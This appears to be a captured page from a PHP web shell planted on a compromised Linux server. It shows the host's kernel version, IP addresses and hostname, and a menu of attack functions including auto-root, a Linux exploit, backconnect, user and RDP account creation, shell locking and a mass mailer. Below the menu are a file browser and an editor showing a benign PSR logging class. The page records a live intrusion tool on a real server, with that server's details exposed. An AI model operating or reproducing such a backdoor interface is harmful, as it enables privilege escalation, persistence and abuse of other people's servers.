Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
cpanel /
ea-wappspector /
vendor /
psr /
log /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
AbstractLogger.php
414
B
-rw-r--r--
InvalidArgumentException.php
96
B
-rw-r--r--
LogLevel.php
336
B
-rw-r--r--
LoggerAwareInterface.php
297
B
-rw-r--r--
LoggerAwareTrait.php
426
B
-rw-r--r--
LoggerInterface.php
3.26
KB
-rw-r--r--
LoggerTrait.php
3.56
KB
-rw-r--r--
NullLogger.php
732
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NullLogger.php
<?php namespace Psr\Log; /** * This Logger can be used to avoid conditional log calls. * * Logging should always be optional, and if no logger is provided to your * library creating a NullLogger instance to have something to throw logs at * is a good way to avoid littering your code with `if ($this->logger) { }` * blocks. */ class NullLogger extends AbstractLogger { /** * Logs with an arbitrary level. * * @param mixed $level * @param string|\Stringable $message * @param array $context * * @return void * * @throws \Psr\Log\InvalidArgumentException */ public function log($level, string|\Stringable $message, array $context = []) { // noop } }
Close